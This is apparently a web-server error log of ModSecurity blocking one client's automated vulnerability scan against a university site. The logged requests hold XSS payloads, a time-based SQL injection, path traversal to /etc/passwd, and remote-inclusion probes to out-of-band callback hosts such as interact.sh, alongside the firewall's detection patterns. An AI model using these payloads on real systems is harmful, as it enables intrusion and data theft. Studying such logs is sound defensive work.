[Tue Aug 29 11:52:02.796563 2023] [:error] [pid 2548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:search_term. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:search_term: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/"] [unique_id "ZO15csCo-f0AAAn0GZ4AAAAa"]
[Tue Aug 29 11:52:02.799617 2023] [:error] [pid 2559] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:contactId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '></ found within ARGS:contactId: contactId'></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/wp-content/plugins/infusionsoft/Infusionsoft/tests/notAuto_test_ContactService_pauseCampaign.php"] [unique_id "ZO15csCo-f0AAAn-wvcAAAAB"]
[Tue Aug 29 11:52:02.823200 2023] [:error] [pid 2491] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "mbkm.unla.ac.id"] [uri "/wbm/login/"] [unique_id "ZO15csCo-f0AAAm7nFMAAAAE"]
[Tue Aug 29 11:52:04.814468 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ed. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ');});}); found within ARGS:ed: foooooooooooooo');});});javascript:alert('document.domain');//g"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/Dialog/FileDialog.aspx"] [unique_id "ZO15dMCo-f0AAAnd3DoAAAAI"]
[Tue Aug 29 11:52:05.056478 2023] [:error] [pid 2557] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnijtjmimvgniikdb09r49ka4dubyuq.oast.site/ found within TX:1: cjmnijtjmimvgniikdb09r49ka4dubyuq.oast.site/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "mbkm.unla.ac.id"] [uri "/wp-json/oembed/1.0/proxy"] [unique_id "ZO15dcCo-f0AAAn959kAAAAD"]
[Tue Aug 29 11:52:05.615547 2023] [:error] [pid 2504] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:secret. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:secret: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/login.php"] [unique_id "ZO15dcCo-f0AAAnIlncAAAAV"]
[Tue Aug 29 11:52:06.553729 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:to. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ) found within ARGS:to: /92874';alert(document.domain)//280"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "mbkm.unla.ac.id"] [uri "/auth/login"] [unique_id "ZO15dsCo-f0AAAnd3EAAAAAI"]
[Tue Aug 29 11:52:06.606673 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:page: javascript:alert(document.domain)//"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "mbkm.unla.ac.id"] [uri "/iwc/idcStateError.iwc"] [unique_id "ZO15dsCo-f0AAAlUlpEAAAA0"]
[Tue Aug 29 11:52:08.595560 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "mbkm.unla.ac.id"] [uri "/bitrix/rk.php"] [unique_id "ZO15eMCo-f0AAAnTlLkAAAAA"]
[Tue Aug 29 11:52:08.675223 2023] [:error] [pid 2562] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:fill. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:fill: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/wp-content/plugins/checklist/images/checklist-icon.php"] [unique_id "ZO15eMCo-f0AAAoCWEYAAAAB"]
[Tue Aug 29 11:52:09.602070 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: domain)>11 found within ARGS:email: test@test.com\\x22><img src=a onerror=alert(document.domain)>11"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/seo/seopanel/login.php"] [unique_id "ZO15ecCo-f0AAAnTlL4AAAAA"]
[Tue Aug 29 11:52:09.711111 2023] [:error] [pid 2560] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "mbkm.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15ecCo-f0AAAoAku8AAAAC"]
[Tue Aug 29 11:52:10.678987 2023] [:error] [pid 2504] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "mbkm.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15esCo-f0AAAnIloAAAAAV"]
[Tue Aug 29 11:52:11.663747 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:password: admin\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/fw.login.php"] [unique_id "ZO15e8Co-f0AAAlUlpsAAAA0"]
[Tue Aug 29 11:52:11.671323 2023] [:error] [pid 2532] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "mbkm.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15e8Co-f0AAAnkwfYAAAAY"]
[Tue Aug 29 11:52:12.619353 2023] [:error] [pid 2557] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "mbkm.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15fMCo-f0AAAn95@kAAAAD"]
[Tue Aug 29 11:52:13.537716 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/propertyfinder/component/jesectionfinder/"] [unique_id "ZO15fcCo-f0AAAjdQawAAAAZ"]
[Tue Aug 29 11:52:13.747778 2023] [:error] [pid 2376] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "mbkm.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15fcCo-f0AAAlIBkgAAAAn"]
[Tue Aug 29 11:52:14.679911 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:1[3]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))-- found within ARGS:1[3]: or 'a'='a') and (select sleep(6))--"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/api/v1/components"] [unique_id "ZO15fsCo-f0AAAlUlqgAAAA0"]
[Tue Aug 29 11:52:14.687486 2023] [:error] [pid 2535] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:event3. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  / [ found within ARGS:event3: 3 / [28] [BANNER_AREA_FOOTER2] \\xd0\\x9f\\xd0\\xbe\\xd1\\x81\\xd0\\xb5\\xd1\\x82\\xd0\\xb8\\xd1\\x82\\xd0\\xb5 \\xd0\\xb2\\xd0\\xb2\\xd0\\xbe\\xd0\\xb4\\xd0\\xbd\\xd1\\x83\\xd1\\x8e \\xd0\\xb1\\xd0\\xb5\\xd1\\x81\\xd0\\xbf\\xd0\\xbb\\xd0\\xb0\\xd1\\x82\\xd0\\xbd\\xd1\\x83\\xd1\\x8e \\xd0\\xbb\\xd0\\xb5\\xd0\\xba\\xd1\\x86\\xd0\\xb8\\xd1\\x8e APTOS"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/bitrix/rk.php"] [unique_id "ZO15fsCo-f0AAAnn2BgAAAAe"]
[Tue Aug 29 11:52:14.703044 2023] [:error] [pid 2504] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh/ found within TX:1: interact.sh/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "mbkm.unla.ac.id"] [uri "/remotereporter/load_logfiles.php"] [unique_id "ZO15fsCo-f0AAAnIlpQAAAAV"]
[Tue Aug 29 11:52:15.624067 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:event3. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  / [ found within ARGS:event3: 1 / [84] [MOBILE_HOME] Love Card"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/bitrix/rk.php"] [unique_id "ZO15f8Co-f0AAAlUlq8AAAA0"]
[Tue Aug 29 11:52:16.670916 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:working_dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../../../../../../../../ found within ARGS:working_dir: /../../../../../../../../../../../../../../../../../../../etc"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/download"] [unique_id "ZO15gMCo-f0AAAnd3FgAAAAI"]
[Tue Aug 29 11:52:16.720155 2023] [:error] [pid 2531] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:event3. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  / [ found within ARGS:event3: 1 / [691] [NEW_INDEX_BANNERS] Trade-in football"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/bitrix/rk.php"] [unique_id "ZO15gMCo-f0AAAnjjNYAAAAX"]
[Tue Aug 29 11:52:17.545131 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:event3. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  / [ found within ARGS:event3: 5 / [129] [GARMIN_AKCII] Garmin \\xe1\\xee\\xed\\xf3\\xf1 \\xed\\xee\\xe2\\xee\\xf1\\xf2\\xfc \\xe2 \\xe0\\xea\\xf6\\xe8\\xe8"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/bitrix/rk.php"] [unique_id "ZO15gcCo-f0AAAnd3FoAAAAI"]
[Tue Aug 29 11:52:17.689101 2023] [:error] [pid 2548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:working_dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../../../../../../../../ found within ARGS:working_dir: /../../../../../../../../../../../../../../../../../../../etc"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/laravel-filemanager/download"] [unique_id "ZO15gcCo-f0AAAn0GdMAAAAa"]
[Tue Aug 29 11:52:17.709708 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15gcCo-f0AAAjdQbwAAAAZ"]
[Tue Aug 29 11:52:17.862193 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ContactId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:ContactId: \\x22><script>alert(document.domain);</script><\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/wp-content/plugins/infusionsoft/Infusionsoft/examples/leadscoring.php"] [unique_id "ZO15gcCo-f0AAAnTlOMAAAAA"]
[Tue Aug 29 11:52:18.539325 2023] [:error] [pid 2532] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:event1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xd0\\xa1\\xd0\\xbf\\xd0\\xb5\\xd1\\x86\\xd0\\xb8\\xd0\\xb0\\xd0\\xbb\\xd1\\x8c\\xd0\\xbd\\xd1\\x8b\\xd0\\xb5 \\xd0\\xb4\\xd0\\xbe\\xd0\\xba\\xd0\\xbb\\xd0\\xb0\\xd0\\xb4\\xd1\\x8b found within ARGS:event1: \\xd0\\xa1\\xd0\\xbf\\xd0\\xb5\\xd1\\x86\\xd0\\xb8\\xd0\\xb0\\xd0\\xbb\\xd1\\x8c\\xd0\\xbd\\xd1\\x8b\\xd0\\xb5 \\xd0\\xb4\\xd0\\xbe\\xd0\\xba\\xd0\\xbb\\xd0\\xb0\\xd0\\xb4\\xd1\\x8b"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15gsCo-f0AAAnkwhEAAAAY"]
[Tue Aug 29 11:52:19.611422 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:event1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xd0\\xa1\\xd0\\xbf\\xd0\\xb5\\xd1\\x86\\xd0\\xb8\\xd0\\xb0\\xd0\\xbb\\xd1\\x8c\\xd0\\xbd\\xd1\\x8b\\xd0\\xb5 \\xd0\\xb4\\xd0\\xbe\\xd0\\xba\\xd0\\xbb\\xd0\\xb0\\xd0\\xb4\\xd1\\x8b found within ARGS:event1: \\xd0\\xa1\\xd0\\xbf\\xd0\\xb5\\xd1\\x86\\xd0\\xb8\\xd0\\xb0\\xd0\\xbb\\xd1\\x8c\\xd0\\xbd\\xd1\\x8b\\xd0\\xb5 \\xd0\\xb4\\xd0\\xbe\\xd0\\xba\\xd0\\xbb\\xd0\\xb0\\xd0\\xb4\\xd1\\x8b"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15g8Co-f0AAAnTlOsAAAAA"]
[Tue Aug 29 11:52:20.864867 2023] [:error] [pid 2530] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ) found within ARGS:author: x\\x22 onmouseover=alert(document.domain) x="] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15hMCo-f0AAAni-BMAAAAU"]
[Tue Aug 29 11:52:22.004983 2023] [:error] [pid 2532] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: x\\x22 onmouseover=alert(document.domain) x=\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/forum/index.php"] [unique_id "ZO15hsCo-f0AAAnkwiYAAAAY"]
